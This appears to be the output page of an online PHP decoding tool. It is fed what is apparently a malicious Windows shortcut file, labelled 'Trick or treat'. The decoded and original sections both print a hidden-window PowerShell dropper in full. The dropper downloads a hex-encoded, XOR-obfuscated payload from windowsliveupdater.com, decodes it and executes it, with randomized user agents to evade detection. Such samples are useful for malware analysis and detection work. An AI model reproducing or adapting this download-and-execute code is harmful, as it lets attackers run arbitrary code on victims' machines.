PHP Decode

Decoded Output

<?  LF@FC5PO :i+00/C:\V1Windows@     .WindowsZ1system32B   .system32V2cmd.exe@  .cmd.exeTrick or treatC:/k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden "$asvods ='';$UserAgents = @('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/15.15063','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko');$RandomUserAgent = $UserAgents | Get-Random;$WebClient = New-Object System.Net.WebClient;$WebClient.Headers.Add('User-Agent', $RandomUserAgent);$boddmei = $WebClient.DownloadString('http://windowsliveupdater.com');$vurnwos ='';for($i=0;$i -le $boddmei.Length-2;$i=$i+2){$bodms=$boddmei[$i]+$boddmei[$i+1];$decodedChar = [char]([convert]::ToInt16($bodms, 16));$xoredChar=[char]([byte]($decodedChar) -bxor 0x1d);$vurnwos = $vurnwos + $xoredChar};Invoke-Command -ScriptBlock ([Scriptblock]::Create($vurnwos));Invoke-Command -ScriptBlock ([Scriptblock]::Create($asvods));C:\Windows\System32\shell32.dll%SystemRoot%\System32\shell32.dll%SystemRoot%\System32\shell32.dll% 
                                                                wN]ND.Q      1SPSXFL8C&mm.S-1-5-21-3849600975-1564034632-632203374-1001 ?>

Original Code

LF@FC5PO :i+00/C:\V1Windows@     .WindowsZ1system32B   .system32V2cmd.exe@  .cmd.exeTrick or treatC:/k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden "$asvods ='';$UserAgents = @('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/15.15063','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko');$RandomUserAgent = $UserAgents | Get-Random;$WebClient = New-Object System.Net.WebClient;$WebClient.Headers.Add('User-Agent', $RandomUserAgent);$boddmei = $WebClient.DownloadString('http://windowsliveupdater.com');$vurnwos ='';for($i=0;$i -le $boddmei.Length-2;$i=$i+2){$bodms=$boddmei[$i]+$boddmei[$i+1];$decodedChar = [char]([convert]::ToInt16($bodms, 16));$xoredChar=[char]([byte]($decodedChar) -bxor 0x1d);$vurnwos = $vurnwos + $xoredChar};Invoke-Command -ScriptBlock ([Scriptblock]::Create($vurnwos));Invoke-Command -ScriptBlock ([Scriptblock]::Create($asvods));C:\Windows\System32\shell32.dll%SystemRoot%\System32\shell32.dll%SystemRoot%\System32\shell32.dll%
                                                                wN]ND.Q      1SPSXFL8C&mm.S-1-5-21-3849600975-1564034632-632203374-1001

Function Calls

None

Variables

None

Stats

MD5 49b4a1b5eb54b55a29ed1a01acfff538
Eval Count 0
Decode Time 44 ms